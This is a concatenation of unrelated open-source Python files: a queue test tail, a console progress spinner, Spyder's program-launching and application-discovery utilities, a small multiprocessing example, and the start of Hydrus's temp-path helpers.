# Check the Queue isn't damaged.
# put failed, but get succeeded - re-add
q.put("last")
# Test a failing timeout put
q.fail_next_put = True
try:
self.do_exceptional_blocking_test(q.put, ("full", True, 10), q.get, (),
FailingQueueException)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# Check the Queue isn't damaged.
# put failed, but get succeeded - re-add
q.put("last")
self.assertTrue(q.full(), "Queue should be full")
q.get()
self.assertTrue(not q.full(), "Queue should not be full")
q.put("last")
self.assertTrue(q.full(), "Queue should be full")
# Test a blocking put
self.do_blocking_test(q.put, ("full",), q.get, ())
# Empty it
for i in range(QUEUE_SIZE):
q.get()
self.assertTrue(q.empty(), "Queue should be empty")
q.put("first")
q.fail_next_get = True
try:
q.get()
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
self.assertTrue(not q.empty(), "Queue should not be empty")
q.fail_next_get = True
try:
q.get(timeout=0.1)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
self.assertTrue(not q.empty(), "Queue should not be empty")
q.get()
self.assertTrue(q.empty(), "Queue should be empty")
q.fail_next_get = True
try:
self.do_exceptional_blocking_test(q.get, (), q.put, ('empty',),
FailingQueueException)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# put succeeded, but get failed.
self.assertTrue(not q.empty(), "Queue should not be empty")
q.get()
self.assertTrue(q.empty(), "Queue should be empty")
def test_failing_queue(self):
# Test to make sure a queue is functioning correctly.
# Done twice to the same instance.
q = FailingQueue(QUEUE_SIZE)
self.failing_queue_test(q)
self.failing_queue_test(q)
def test_main():
test_support.run_unittest(QueueTest, LifoQueueTest, PriorityQueueTest,
FailingQueueTest)
if __name__ == "__main__":
test_main()
|
spinner.py
|
# Copyright 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import itertools
import sys
from multiprocessing import Event, Lock, Process
class ProgressSpinner:
"""
Progress spinner for console.
"""
def __init__(self, message, delay=0.2):
self.spinner_symbols = itertools.cycle(["-", "\\", "|", "/"])
self.delay = delay
self.stop_event = Event()
self.spinner_visible = False
sys.stdout.write(message)
def __enter__(self):
self.start()
def __exit__(self, exception, value, traceback):
self.stop()
def _spinner_task(self):
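        # Runs in the spinner process: until the stop event is set, erase the
        # previous symbol and write the next one every `delay` seconds.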
while not self.stop_event.wait(self.delay):
self._remove_spinner()
self._write_next_symbol()
def _write_next_symbol(self):
with self._spinner_lock:
if not self.spinner_visible:
sys.stdout.write(next(self.spinner_symbols))
self.spinner_visible = True
sys.stdout.flush()
def _remove_spinner(self, cleanup=False):
with self._spinner_lock:
if self.spinner_visible:
sys.stdout.write("\b")
self.spinner_visible = False
if cleanup:
# overwrite spinner symbol with whitespace
sys.stdout.write(" ")
sys.stdout.write("\r")
sys.stdout.flush()
def start(self):
"""
Start spinner as a separate process.
"""
if sys.stdout.isatty():
self._spinner_lock = Lock()
self.stop_event.clear()
self.spinner_process = Process(target=self._spinner_task)
self.spinner_process.start()
def stop(self):
"""
Stop spinner process.
"""
sys.stdout.write("\b")
sys.stdout.write("Done")
if sys.stdout.isatty():
self.stop_event.set()
self._remove_spinner(cleanup=True)
self.spinner_process.join()
sys.stdout.write("\n")
else:
sys.stdout.write("\r")
|
programs.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""Running programs utilities."""
from __future__ import print_function
# Standard library imports
from ast import literal_eval
from getpass import getuser
from textwrap import dedent
import glob
import importlib
import itertools
import os
import os.path as osp
import re
import subprocess
import sys
import tempfile
import threading
import time
# Third party imports
import pkg_resources
from pkg_resources import parse_version
import psutil
# Local imports
from spyder.config.base import (is_stable_version, running_under_pytest,
get_home_dir)
from spyder.config.utils import is_anaconda
from spyder.py3compat import PY2, is_text_string, to_text_string
from spyder.utils import encoding
from spyder.utils.misc import get_python_executable
HERE = osp.abspath(osp.dirname(__file__))
class ProgramError(Exception):
pass
def get_temp_dir(suffix=None):
"""
Return temporary Spyder directory, checking previously that it exists.
"""
to_join = [tempfile.gettempdir()]
if os.name == 'nt':
to_join.append('spyder')
else:
username = encoding.to_unicode_from_fs(getuser())
to_join.append('spyder-' + username)
if suffix is not None:
to_join.append(suffix)
tempdir = osp.join(*to_join)
if not osp.isdir(tempdir):
os.mkdir(tempdir)
return tempdir
def is_program_installed(basename):
"""
Return program absolute path if installed in PATH.
Otherwise, return None.
Also searches specific platform dependent paths that are not already in
PATH. This permits general use without assuming user profiles are
    sourced (e.g. .bash_profile), such as when login shells are not used to
launch Spyder.
On macOS systems, a .app is considered installed if it exists.
"""
home = get_home_dir()
req_paths = []
if sys.platform == 'darwin':
if basename.endswith('.app') and osp.exists(basename):
return basename
pyenv = [
osp.join('/usr', 'local', 'bin'),
osp.join(home, '.pyenv', 'bin')
]
# Prioritize Anaconda before Miniconda; local before global.
a = [osp.join(home, 'opt'), '/opt']
b = ['anaconda', 'miniconda', 'anaconda3', 'miniconda3']
conda = [osp.join(*p, 'condabin') for p in itertools.product(a, b)]
req_paths.extend(pyenv + conda)
elif sys.platform.startswith('linux'):
pyenv = [
osp.join('/usr', 'local', 'bin'),
osp.join(home, '.pyenv', 'bin')
]
a = [home, '/opt']
b = ['anaconda', 'miniconda', 'anaconda3', 'miniconda3']
conda = [osp.join(*p, 'condabin') for p in itertools.product(a, b)]
req_paths.extend(pyenv + conda)
elif os.name == 'nt':
pyenv = [osp.join(home, '.pyenv', 'pyenv-win', 'bin')]
a = [home, 'C:\\', osp.join('C:\\', 'ProgramData')]
b = ['Anaconda', 'Miniconda', 'Anaconda3', 'Miniconda3']
conda = [osp.join(*p, 'condabin') for p in itertools.product(a, b)]
req_paths.extend(pyenv + conda)
for path in os.environ['PATH'].split(os.pathsep) + req_paths:
abspath = osp.join(path, basename)
if osp.isfile(abspath):
return abspath
def find_program(basename):
"""
Find program in PATH and return absolute path
Try adding .exe or .bat to basename on Windows platforms
(return None if not found)
"""
names = [basename]
if os.name == 'nt':
# Windows platforms
extensions = ('.exe', '.bat', '.cmd')
if not basename.endswith(extensions):
names = [basename+ext for ext in extensions]+[basename]
for name in names:
path = is_program_installed(name)
if path:
return path
def get_full_command_for_program(path):
"""
Return the list of tokens necessary to open the program
at a given path.
On macOS systems, this function prefixes .app paths with
'open -a', which is necessary to run the application.
On all other OS's, this function has no effect.
:str path: The path of the program to run.
:return: The list of tokens necessary to run the program.
"""
if sys.platform == 'darwin' and path.endswith('.app'):
return ['open', '-a', path]
return [path]
def alter_subprocess_kwargs_by_platform(**kwargs):
"""
Given a dict, populate kwargs to create a generally
useful default setup for running subprocess processes
on different platforms. For example, `close_fds` is
set on posix and creation of a new console window is
disabled on Windows.
This function will alter the given kwargs and return
the modified dict.
"""
kwargs.setdefault('close_fds', os.name == 'posix')
if os.name == 'nt':
CONSOLE_CREATION_FLAGS = 0 # Default value
# See: https://msdn.microsoft.com/en-us/library/windows/desktop/ms684863%28v=vs.85%29.aspx
CREATE_NO_WINDOW = 0x08000000
# We "or" them together
CONSOLE_CREATION_FLAGS |= CREATE_NO_WINDOW
kwargs.setdefault('creationflags', CONSOLE_CREATION_FLAGS)
# ensure Windows subprocess environment has SYSTEMROOT
if kwargs.get('env') is not None:
# Is SYSTEMROOT, SYSTEMDRIVE in env? case insensitive
for env_var in ['SYSTEMROOT', 'SYSTEMDRIVE']:
if env_var not in map(str.upper, kwargs['env'].keys()):
# Add from os.environ
for k, v in os.environ.items():
if env_var == k.upper():
kwargs['env'].update({k: v})
break # don't risk multiple values
else:
# linux and macOS
if kwargs.get('env') is not None:
if 'HOME' not in kwargs['env']:
kwargs['env'].update({'HOME': get_home_dir()})
return kwargs
def run_shell_command(cmdstr, **subprocess_kwargs):
"""
Execute the given shell command.
Note that *args and **kwargs will be passed to the subprocess call.
If 'shell' is given in subprocess_kwargs it must be True,
    otherwise ProgramError will be raised.
If 'executable' is not given in subprocess_kwargs, it will
be set to the value of the SHELL environment variable.
Note that stdin, stdout and stderr will be set by default
to PIPE unless specified in subprocess_kwargs.
:str cmdstr: The string run as a shell command.
:subprocess_kwargs: These will be passed to subprocess.Popen.
"""
if 'shell' in subprocess_kwargs and not subprocess_kwargs['shell']:
raise ProgramError(
'The "shell" kwarg may be omitted, but if '
'provided it must be True.')
else:
subprocess_kwargs['shell'] = True
# Don't pass SHELL to subprocess on Windows because it makes this
    # function fail in Git Bash (where SHELL is declared; other Windows
# shells don't set it).
if not os.name == 'nt':
if 'executable' not in subprocess_kwargs:
subprocess_kwargs['executable'] = os.getenv('SHELL')
for stream in ['stdin', 'stdout', 'stderr']:
subprocess_kwargs.setdefault(stream, subprocess.PIPE)
subprocess_kwargs = alter_subprocess_kwargs_by_platform(
**subprocess_kwargs)
return subprocess.Popen(cmdstr, **subprocess_kwargs)
def run_program(program, args=None, **subprocess_kwargs):
"""
Run program in a separate process.
NOTE: returns the process object created by
`subprocess.Popen()`. This can be used with
`proc.communicate()` for example.
If 'shell' appears in the kwargs, it must be False,
otherwise ProgramError will be raised.
If only the program name is given and not the full path,
a lookup will be performed to find the program. If the
lookup fails, ProgramError will be raised.
Note that stdin, stdout and stderr will be set by default
to PIPE unless specified in subprocess_kwargs.
:str program: The name of the program to run.
:list args: The program arguments.
:subprocess_kwargs: These will be passed to subprocess.Popen.
"""
if 'shell' in subprocess_kwargs and subprocess_kwargs['shell']:
raise ProgramError(
"This function is only for non-shell programs, "
"use run_shell_command() instead.")
fullcmd = find_program(program)
if not fullcmd:
raise ProgramError("Program %s was not found" % program)
# As per subprocess, we make a complete list of prog+args
fullcmd = get_full_command_for_program(fullcmd) + (args or [])
for stream in ['stdin', 'stdout', 'stderr']:
subprocess_kwargs.setdefault(stream, subprocess.PIPE)
subprocess_kwargs = alter_subprocess_kwargs_by_platform(
**subprocess_kwargs)
return subprocess.Popen(fullcmd, **subprocess_kwargs)
def parse_linux_desktop_entry(fpath):
"""Load data from desktop entry with xdg specification."""
from xdg.DesktopEntry import DesktopEntry
try:
entry = DesktopEntry(fpath)
entry_data = {}
entry_data['name'] = entry.getName()
entry_data['icon_path'] = entry.getIcon()
entry_data['exec'] = entry.getExec()
entry_data['type'] = entry.getType()
entry_data['hidden'] = entry.getHidden()
entry_data['fpath'] = fpath
except Exception:
entry_data = {
'name': '',
'icon_path': '',
'hidden': '',
'exec': '',
'type': '',
'fpath': fpath
}
return entry_data
def _get_mac_application_icon_path(app_bundle_path):
"""Parse mac application bundle and return path for *.icns file."""
import plistlib
    contents_path = os.path.join(app_bundle_path, 'Contents')
info_path = os.path.join(contents_path, 'Info.plist')
pl = {}
if os.path.isfile(info_path):
try:
# readPlist is deprecated but needed for py27 compat
pl = plistlib.readPlist(info_path)
except Exception:
pass
icon_file = pl.get('CFBundleIconFile')
icon_path = None
if icon_file:
icon_path = os.path.join(contents_path, 'Resources', icon_file)
# Some app bundles seem to list the icon name without extension
if not icon_path.endswith('.icns'):
icon_path = icon_path + '.icns'
if not os.path.isfile(icon_path):
icon_path = None
return icon_path
def get_username():
"""Return current session username."""
if os.name == 'nt':
username = os.getlogin()
else:
import pwd
username = pwd.getpwuid(os.getuid())[0]
return username
def _get_win_reg_info(key_path, hive, flag, subkeys):
"""
See: https://stackoverflow.com/q/53132434
"""
import winreg
reg = winreg.ConnectRegistry(None, hive)
software_list = []
try:
key = winreg.OpenKey(reg, key_path, 0, winreg.KEY_READ | flag)
count_subkey = winreg.QueryInfoKey(key)[0]
for index in range(count_subkey):
software = {}
try:
subkey_name = winreg.EnumKey(key, index)
if not (subkey_name.startswith('{')
and subkey_name.endswith('}')):
software['key'] = subkey_name
subkey = winreg.OpenKey(key, subkey_name)
for property in subkeys:
try:
value = winreg.QueryValueEx(subkey, property)[0]
software[property] = value
except EnvironmentError:
software[property] = ''
software_list.append(software)
except EnvironmentError:
continue
except Exception:
pass
return software_list
def _clean_win_application_path(path):
"""Normalize windows path and remove extra quotes."""
path = path.replace('\\', '/').lower()
# Check for quotes at start and end
if path[0] == '"' and path[-1] == '"':
path = literal_eval(path)
return path
def _get_win_applications():
"""Return all system installed windows applications."""
import winreg
# See:
# https://docs.microsoft.com/en-us/windows/desktop/shell/app-registration
key_path = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths'
# Hive and flags
hfs = [
(winreg.HKEY_LOCAL_MACHINE, winreg.KEY_WOW64_32KEY),
(winreg.HKEY_LOCAL_MACHINE, winreg.KEY_WOW64_64KEY),
(winreg.HKEY_CURRENT_USER, 0),
]
subkeys = [None]
sort_key = 'key'
app_paths = {}
_apps = [_get_win_reg_info(key_path, hf[0], hf[1], subkeys) for hf in hfs]
software_list = itertools.chain(*_apps)
for software in sorted(software_list, key=lambda x: x[sort_key]):
if software[None]:
key = software['key'].capitalize().replace('.exe', '')
expanded_fpath = os.path.expandvars(software[None])
expanded_fpath = _clean_win_application_path(expanded_fpath)
app_paths[key] = expanded_fpath
# See:
# https://www.blog.pythonlibrary.org/2010/03/03/finding-installed-software-using-python/
# https://stackoverflow.com/q/53132434
key_path = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall'
subkeys = ['DisplayName', 'InstallLocation', 'DisplayIcon']
sort_key = 'DisplayName'
apps = {}
_apps = [_get_win_reg_info(key_path, hf[0], hf[1], subkeys) for hf in hfs]
software_list = itertools.chain(*_apps)
for software in sorted(software_list, key=lambda x: x[sort_key]):
location = software['InstallLocation']
name = software['DisplayName']
icon = software['DisplayIcon']
key = software['key']
if name and icon:
icon = icon.replace('"', '')
icon = icon.split(',')[0]
if location == '' and icon:
location = os.path.dirname(icon)
if not os.path.isfile(icon):
icon = ''
if location and os.path.isdir(location):
files = [f for f in os.listdir(location)
if os.path.isfile(os.path.join(location, f))]
if files:
for fname in files:
fn_low = fname.lower()
valid_file = fn_low.endswith(('.exe', '.com', '.bat'))
if valid_file and not fn_low.startswith('unins'):
fpath = os.path.join(location, fname)
expanded_fpath = os.path.expandvars(fpath)
expanded_fpath = _clean_win_application_path(
expanded_fpath)
apps[name + ' (' + fname + ')'] = expanded_fpath
# Join data
values = list(zip(*apps.values()))[-1]
for name, fpath in app_paths.items():
if fpath not in values:
apps[name] = fpath
return apps
def _get_linux_applications():
"""Return all system installed linux applications."""
# See:
# https://standards.freedesktop.org/desktop-entry-spec/desktop-entry-spec-latest.html
# https://askubuntu.com/q/433609
apps = {}
desktop_app_paths = [
'/usr/share/**/*.desktop',
'~/.local/share/**/*.desktop',
]
all_entries_data = []
for path in desktop_app_paths:
fpaths = glob.glob(path)
for fpath in fpaths:
entry_data = parse_linux_desktop_entry(fpath)
all_entries_data.append(entry_data)
for entry_data in sorted(all_entries_data, key=lambda x: x['name']):
if not entry_data['hidden'] and entry_data['type'] == 'Application':
apps[entry_data['name']] = entry_data['fpath']
return apps
def _get_mac_applications():
"""Return all system installed osx applications."""
apps = {}
app_folders = [
'/**/*.app',
'/Users/{}/**/*.app'.format(get_username())
]
fpaths = []
for path in app_folders:
fpaths += glob.glob(path)
for fpath in fpaths:
if os.path.isdir(fpath):
name = os.path.basename(fpath).split('.app')[0]
apps[name] = fpath
return apps
def get_application_icon(fpath):
"""Return application icon or default icon if not found."""
from qtpy.QtGui import QIcon
from spyder.utils.icon_manager import ima
if os.path.isfile(fpath) or os.path.isdir(fpath):
icon = ima.icon('no_match')
if sys.platform == 'darwin':
icon_path = _get_mac_application_icon_path(fpath)
if icon_path and os.path.isfile(icon_path):
icon = QIcon(icon_path)
elif os.name == 'nt':
pass
else:
entry_data = parse_linux_desktop_entry(fpath)
icon_path = entry_data['icon_path']
if icon_path:
if os.path.isfile(icon_path):
icon = QIcon(icon_path)
else:
icon = QIcon.fromTheme(icon_path)
else:
icon = ima.icon('help')
return icon
def get_installed_applications():
"""
Return all system installed applications.
The return value is a list of tuples where the first item is the icon path
and the second item is the program executable path.
"""
apps = {}
if sys.platform == 'darwin':
apps = _get_mac_applications()
elif os.name == 'nt':
apps = _get_win_applications()
else:
apps = _get_linux_applications()
if sys.platform == 'darwin':
apps = {key: val for (key, val) in apps.items() if osp.isdir(val)}
else:
apps = {key: val for (key, val) in apps.items() if osp.isfile(val)}
return apps
def open_files_with_application(app_path, fnames):
"""
Generalized method for opening files with a specific application.
Returns a dictionary of the command used and the return code.
A code equal to 0 means the application executed successfully.
"""
return_codes = {}
if os.name == 'nt':
fnames = [fname.replace('\\', '/') for fname in fnames]
if sys.platform == 'darwin':
if not (app_path.endswith('.app') and os.path.isdir(app_path)):
raise ValueError('`app_path` must point to a valid OSX '
'application!')
cmd = ['open', '-a', app_path] + fnames
try:
return_code = subprocess.call(cmd)
except Exception:
return_code = 1
return_codes[' '.join(cmd)] = return_code
elif os.name == 'nt':
if not (app_path.endswith(('.exe', '.bat', '.com', '.cmd'))
and os.path.isfile(app_path)):
raise ValueError('`app_path` must point to a valid Windows '
'executable!')
cmd = [app_path] + fnames
try:
return_code = subprocess.call(cmd)
except OSError:
return_code = 1
return_codes[' '.join(cmd)] = return_code
else:
if not (app_path.endswith('.desktop') and os.path.isfile(app_path)):
raise ValueError('`app_path` must point to a valid Linux '
'application!')
entry = parse_linux_desktop_entry(app_path)
app_path = entry['exec']
multi = []
extra = []
if len(fnames) == 1:
fname = fnames[0]
if '%u' in app_path:
cmd = app_path.replace('%u', fname)
elif '%f' in app_path:
cmd = app_path.replace('%f', fname)
elif '%U' in app_path:
cmd = app_path.replace('%U', fname)
elif '%F' in app_path:
cmd = app_path.replace('%F', fname)
else:
cmd = app_path
extra = fnames
elif len(fnames) > 1:
if '%U' in app_path:
cmd = app_path.replace('%U', ' '.join(fnames))
elif '%F' in app_path:
cmd = app_path.replace('%F', ' '.join(fnames))
if '%u' in app_path:
for fname in fnames:
multi.append(app_path.replace('%u', fname))
elif '%f' in app_path:
for fname in fnames:
multi.append(app_path.replace('%f', fname))
else:
cmd = app_path
extra = fnames
if multi:
for cmd in multi:
try:
return_code = subprocess.call([cmd], shell=True)
except Exception:
return_code = 1
return_codes[cmd] = return_code
else:
try:
return_code = subprocess.call([cmd] + extra, shell=True)
except Exception:
return_code = 1
return_codes[cmd] = return_code
return return_codes
def python_script_exists(package=None, module=None):
"""
Return absolute path if Python script exists (otherwise, return None)
package=None -> module is in sys.path (standard library modules)
"""
assert module is not None
if package is None:
spec = importlib.util.find_spec(module)
if spec:
path = spec.origin
else:
path = None
else:
spec = importlib.util.find_spec(package)
if spec:
path = osp.join(spec.origin, module)+'.py'
else:
path = None
if path:
if not osp.isfile(path):
path += 'w'
if osp.isfile(path):
return path
def run_python_script(package=None, module=None, args=[], p_args=[]):
"""
Run Python script in a separate process
package=None -> module is in sys.path (standard library modules)
"""
assert module is not None
assert isinstance(args, (tuple, list)) and isinstance(p_args, (tuple, list))
path = python_script_exists(package, module)
run_program(sys.executable, p_args + [path] + args)
def shell_split(text):
"""
Split the string `text` using shell-like syntax
This avoids breaking single/double-quoted strings (e.g. containing
strings with spaces). This function is almost equivalent to the shlex.split
    function (see standard library `shlex`) except that it supports
unicode strings (shlex does not support unicode until Python 2.7.3).
"""
assert is_text_string(text) # in case a QString is passed...
pattern = r'(\s+|(?<!\\)".*?(?<!\\)"|(?<!\\)\'.*?(?<!\\)\')'
out = []
for token in re.split(pattern, text):
if token.strip():
out.append(token.strip('"').strip("'"))
return out
def get_python_args(fname, python_args, interact, debug, end_args):
"""Construct Python interpreter arguments"""
p_args = []
if python_args is not None:
p_args += python_args.split()
if interact:
p_args.append('-i')
if debug:
p_args.extend(['-m', 'pdb'])
if fname is not None:
if os.name == 'nt' and debug:
# When calling pdb on Windows, one has to replace backslashes by
# slashes to avoid confusion with escape characters (otherwise,
# for example, '\t' will be interpreted as a tabulation):
p_args.append(osp.normpath(fname).replace(os.sep, '/'))
else:
p_args.append(fname)
if end_args:
p_args.extend(shell_split(end_args))
return p_args
def run_python_script_in_terminal(fname, wdir, args, interact,
debug, python_args, executable=None):
"""
Run Python script in an external system terminal.
:str wdir: working directory, may be empty.
"""
if executable is None:
executable = get_python_executable()
    # If fname or python_exe contains spaces, it can't be run on Windows, so we
# have to enclose them in quotes. Also wdir can come with / as os.sep, so
# we need to take care of it.
if os.name == 'nt':
fname = '"' + fname + '"'
wdir = wdir.replace('/', '\\')
executable = '"' + executable + '"'
p_args = [executable]
p_args += get_python_args(fname, python_args, interact, debug, args)
if os.name == 'nt':
cmd = 'start cmd.exe /K "'
if wdir:
cmd += 'cd ' + wdir + ' && '
cmd += ' '.join(p_args) + '"' + ' ^&^& exit'
# Command line and cwd have to be converted to the filesystem
# encoding before passing them to subprocess, but only for
# Python 2.
# See https://bugs.python.org/issue1759845#msg74142 and
# spyder-ide/spyder#1856.
if PY2:
cmd = encoding.to_fs_from_unicode(cmd)
wdir = encoding.to_fs_from_unicode(wdir)
try:
if wdir:
run_shell_command(cmd, cwd=wdir)
else:
run_shell_command(cmd)
except WindowsError:
from qtpy.QtWidgets import QMessageBox
from spyder.config.base import _
QMessageBox.critical(None, _('Run'),
_("It was not possible to run this file in "
"an external terminal"),
QMessageBox.Ok)
elif sys.platform.startswith('linux'):
programs = [{'cmd': 'gnome-terminal',
'wdir-option': '--working-directory',
'execute-option': '-x'},
{'cmd': 'konsole',
'wdir-option': '--workdir',
'execute-option': '-e'},
{'cmd': 'xfce4-terminal',
'wdir-option': '--working-directory',
'execute-option': '-x'},
{'cmd': 'xterm',
'wdir-option': None,
'execute-option': '-e'},]
for program in programs:
if is_program_installed(program['cmd']):
arglist = []
if program['wdir-option'] and wdir:
arglist += [program['wdir-option'], wdir]
arglist.append(program['execute-option'])
arglist += p_args
if wdir:
run_program(program['cmd'], arglist, cwd=wdir)
else:
run_program(program['cmd'], arglist)
return
elif sys.platform == 'darwin':
f = tempfile.NamedTemporaryFile('wt', prefix='run_spyder_',
suffix='.sh', dir=get_temp_dir(),
delete=False)
if wdir:
f.write('cd {}\n'.format(wdir))
f.write(' '.join(p_args))
f.close()
os.chmod(f.name, 0o777)
def run_terminal_thread():
proc = run_shell_command('open -a Terminal.app ' + f.name)
# Prevent race condition
time.sleep(3)
proc.wait()
os.remove(f.name)
thread = threading.Thread(target=run_terminal_thread)
thread.start()
else:
raise NotImplementedError
def check_version(actver, version, cmp_op):
"""
Check version string of an active module against a required version.
If dev/prerelease tags result in TypeError for string-number comparison,
it is assumed that the dependency is satisfied.
Users on dev branches are responsible for keeping their own packages up to
date.
Copyright (C) 2013 The IPython Development Team
Distributed under the terms of the BSD License.
"""
if isinstance(actver, tuple):
actver = '.'.join([str(i) for i in actver])
try:
if cmp_op == '>':
return parse_version(actver) > parse_version(version)
elif cmp_op == '>=':
return parse_version(actver) >= parse_version(version)
elif cmp_op == '=':
return parse_version(actver) == parse_version(version)
elif cmp_op == '<':
return parse_version(actver) < parse_version(version)
elif cmp_op == '<=':
return parse_version(actver) <= parse_version(version)
else:
return False
except TypeError:
return True
def get_module_version(module_name):
"""Return module version or None if version can't be retrieved."""
mod = __import__(module_name)
ver = getattr(mod, '__version__', getattr(mod, 'VERSION', None))
if not ver:
ver = get_package_version(module_name)
return ver
def get_package_version(package_name):
"""Return package version or None if version can't be retrieved."""
# When support for Python 3.7 and below is dropped, this can be replaced
# with the built-in importlib.metadata.version
try:
ver = pkg_resources.get_distribution(package_name).version
return ver
except pkg_resources.DistributionNotFound:
return None
def is_module_installed(module_name, version=None, interpreter=None):
"""
Return True if module ``module_name`` is installed
If ``version`` is not None, checks that the module's installed version is
consistent with ``version``. The module must have an attribute named
'__version__' or 'VERSION'.
version may start with =, >=, > or < to specify the exact requirement ;
multiple conditions may be separated by ';' (e.g. '>=0.13;<1.0')
If ``interpreter`` is not None, checks if a module is installed with a
given ``version`` in the ``interpreter``'s environment. Otherwise checks
in Spyder's environment.
"""
if interpreter is not None:
if is_python_interpreter(interpreter):
cmd = dedent("""
try:
import {} as mod
except Exception:
print('No Module') # spyder: test-skip
print(getattr(mod, '__version__', getattr(mod, 'VERSION', None))) # spyder: test-skip
""").format(module_name)
try:
# use clean environment
proc = run_program(interpreter, ['-c', cmd], env={})
stdout, stderr = proc.communicate()
stdout = stdout.decode().strip()
except Exception:
return False
if 'No Module' in stdout:
return False
elif stdout != 'None':
# the module is installed and it has a version attribute
module_version = stdout
else:
module_version = None
else:
# Try to not take a wrong decision if interpreter check fails
return True
else:
# interpreter is None, just get module version in Spyder environment
try:
module_version = get_module_version(module_name)
except Exception:
# Module is not installed
return False
# This can happen if a package was not uninstalled correctly. For
    # instance, if its main __pycache__ directory is left behind.
try:
mod = __import__(module_name)
if not getattr(mod, '__file__', None):
return False
except Exception:
pass
if version is None:
return True
else:
if ';' in version:
versions = version.split(';')
else:
versions = [version]
output = True
for _ver in versions:
match = re.search(r'[0-9]', _ver)
assert match is not None, "Invalid version number"
symb = _ver[:match.start()]
if not symb:
symb = '='
assert symb in ('>=', '>', '=', '<', '<='),\
"Invalid version condition '%s'" % symb
ver = _ver[match.start():]
output = output and check_version(module_version, ver, symb)
return output
def is_python_interpreter_valid_name(filename):
"""Check that the python interpreter file has a valid name."""
pattern = r'.*python(\d\.?\d*)?(w)?(.exe)?$'
if re.match(pattern, filename, flags=re.I) is None:
return False
else:
return True
def is_python_interpreter(filename):
"""Evaluate whether a file is a python interpreter or not."""
real_filename = os.path.realpath(filename) # To follow symlink if existent
if (not osp.isfile(real_filename) or
not is_python_interpreter_valid_name(filename)):
return False
elif is_pythonw(filename):
if os.name == 'nt':
# pythonw is a binary on Windows
if not encoding.is_text_file(real_filename):
return True
else:
return False
elif sys.platform == 'darwin':
# pythonw is a text file in Anaconda but a binary in
# the system
if is_anaconda() and encoding.is_text_file(real_filename):
return True
elif not encoding.is_text_file(real_filename):
return True
else:
return False
else:
# There's no pythonw in other systems
return False
elif encoding.is_text_file(real_filename):
# At this point we can't have a text file
return False
else:
return check_python_help(filename)
def is_pythonw(filename):
"""Check that the python interpreter has 'pythonw'."""
pattern = r'.*python(\d\.?\d*)?w(.exe)?$'
if re.match(pattern, filename, flags=re.I) is None:
return False
else:
return True
def check_python_help(filename):
"""Check that the python interpreter can compile and provide the zen."""
try:
proc = run_program(filename, ['-c', 'import this'], env={})
stdout, _ = proc.communicate()
stdout = to_text_string(stdout)
valid_lines = [
'Beautiful is better than ugly.',
'Explicit is better than implicit.',
'Simple is better than complex.',
'Complex is better than complicated.',
]
if all(line in stdout for line in valid_lines):
return True
else:
return False
except Exception:
return False
def is_spyder_process(pid):
"""
Test whether given PID belongs to a Spyder process.
This is checked by testing the first three command line arguments. This
function returns a bool. If there is no process with this PID or its
command line cannot be accessed (perhaps because the process is owned by
another user), then the function returns False.
"""
try:
p = psutil.Process(int(pid))
# Valid names for main script
names = set(['spyder', 'spyder3', 'spyder.exe', 'spyder3.exe',
'bootstrap.py', 'spyder-script.py', 'Spyder.launch.pyw'])
if running_under_pytest():
names.add('runtests.py')
# Check the first three command line arguments
arguments = set(os.path.basename(arg) for arg in p.cmdline()[:3])
conditions = [names & arguments]
return any(conditions)
except (psutil.NoSuchProcess, psutil.AccessDenied):
return False
def get_interpreter_info(path):
"""Return version information of the selected Python interpreter."""
try:
out, __ = run_program(path, ['-V']).communicate()
out = out.decode()
except Exception:
out = ''
return out.strip()
def find_git():
"""Find git executable in the system."""
if sys.platform == 'darwin':
proc = subprocess.run(
osp.join(HERE, "check-git.sh"), capture_output=True)
if proc.returncode != 0:
return None
return find_program('git')
else:
return find_program('git')
|
processing1.py
|
#! /usr/bin/env python3
# -*-coding:utf-8 -*-
# @Time : 2019/06/16 18:52:49
# @Author : che
# @Email : ch1huizong@gmail.com
from multiprocessing import Process, Queue
import time
def f(q):
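    # Worker process: take one number from the shared queue and sleep that
    # many seconds before finishing.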
x = q.get()
print("Process number %s, sleeps for %s seconds" % (x, x))
    time.sleep(x)  # compare: what if this were time.sleep(10 - x)?
print("Process number %s finished" % x)
q = Queue()
for i in range(10):
q.put(i)
i = Process(target=f, args=[q])
i.start()
print("main process joins on queue")
#i.join() # actually this can be omitted
print("Main Program finished")
|
HydrusPaths.py
|
import gc
from . import HydrusConstants as HC
from . import HydrusData
from . import HydrusExceptions
from . import HydrusGlobals as HG
from . import HydrusThreading
import os
import psutil
import re
import send2trash
import shlex
import shutil
import stat
import subprocess
import sys
import tempfile
import threading
import traceback
TEMP_PATH_LOCK = threading.Lock()
IN_USE_TEMP_PATHS = set()
def AddBaseDirToEnvPath():
# this is a thing to get mpv working, loading the dll/so from the base dir using ctypes
if 'PATH' in os.environ:
os.environ[ 'PATH' ] = HC.BASE_DIR + os.pathsep + os.environ[ 'PATH' ]
def AppendPathUntilNoConflicts( path ):
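    # Append '_0', '_1', ... before the extension until the resulting path
    # does not already exist, and return that free path.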
( path_absent_ext, ext ) = os.path.splitext( path )
good_path_absent_ext = path_absent_ext
i = 0
while os.path.exists( good_path_absent_ext + ext ):
good_path_absent_ext = path_absent_ext + '_' + str( i )
i += 1
return good_path_absent_ext + ext
def CleanUpTempPath( os_file_handle, temp_path ):
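    # Close the temp file handle (retrying once after a gc pass if the first
    # close fails) and delete the file; if deletion fails, remember the path
    # so CleanUpOldTempPaths can retry it later.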
try:
os.close( os_file_handle )
except OSError:
gc.collect()
try:
os.close( os_file_handle )
except OSError:
HydrusData.Print( 'Could not close the temporary file ' + temp_path )
return
try:
os.remove( temp_path )
except OSError:
with TEMP_PATH_LOCK:
IN_USE_TEMP_PATHS.add( ( HydrusData.GetNow(), temp_path ) )
